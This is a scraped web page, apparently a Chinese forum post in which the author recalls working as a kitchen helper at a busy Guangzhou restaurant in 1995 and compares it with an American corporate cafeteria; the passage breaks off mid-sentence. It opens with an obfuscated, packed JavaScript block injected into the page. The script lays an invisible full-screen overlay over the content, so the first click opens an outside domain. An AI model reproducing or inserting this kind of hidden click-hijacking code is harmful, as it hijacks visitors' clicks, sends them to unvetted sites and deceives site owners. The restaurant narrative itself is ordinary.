<script>;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(3(){3 4(){8 o=2.9(\'a\');o.1.b=\'c\';o.1.d=\'0\';o.1.e=\'0\';o.1.f=\'5%\';o.1.g=\'5%\';o.1.h=\'i\';o.1.j=\'k\';o.l(\'m\',()=>{n.p(\'q://r.s\');o.t();u(()=>{2.6.7(o)},v)});2.6.7(o)}4()})();',32,32,'|style|document|function|ad|100|body|appendChild|const|createElement|div|position|fixed|top|left|width|height|zIndex|99999999999|display|flex|addEventListener|click|window||open|https|7ba8|com|remove|setTimeout|10000'.split('|'),0,{}));</script>我90年代在广东几个餐厅的厨房打过杂, 散单为主的餐厅, 从200座至500座的。 厨房都很小, 基本没有冷库, 有几个冷柜。各家厨房的洗锅都是厨师自己洗。
典型的是广州的岗顶酒家, 现在还在营业, 位于华南师大和即南大学大门一两百米的人行天桥边。 我95年在岗顶酒家打杂时, 其生意极旺, 500个座位经常全坐满, 一个厨师一天炒120个菜。 "厨房"在广东是个狭义的概念。 点心部, 厨房部, 和烧腊部是相互独立的。 厨房内包括后锅, 打荷, 上杂, 真板, 水台。
我是95年初在岗顶酒家的厨房部当打荷四个月, 共7个人打荷, 我的职位排在这七个打荷中的第四位, 550元/月。 打荷貌似来自香港英语"HELP", 不是什么事都帮, 只给后锅师傅打下手。 当时厨房共有31人, 按中国的传统, 这31个人相互之间都是不平等的, 按职位高低分为31级, 就像被细分为31个级的军衔一样,
下级按职业道德应该服从上级。
岗顶的菜谱上约有300个出品, 但客人经常不按菜谱点菜, 而是按自己的意愿临时创造新菜下单叫厨房做。 我在岗顶打荷4个月, 当时基本上把我给6个后锅师傅之中的第三把手打下手时目睹的菜都做了笔记, 现在回忆可能有600-800种菜。
我现在干的这个美国厨房, 本质上是个每餐卖150-200份的公司内部食堂, 不能类比中国的酒家, 只能类比中国的食堂, 例如大学的食堂等。 菜谱只有一页纸。 厨房很大, 冷库有个大的30米乘10米, 还有个稍小的冷库, 外加约十五个大冰柜。 随时有个专门的工人刷锅, 而且有时一个人洗锅 |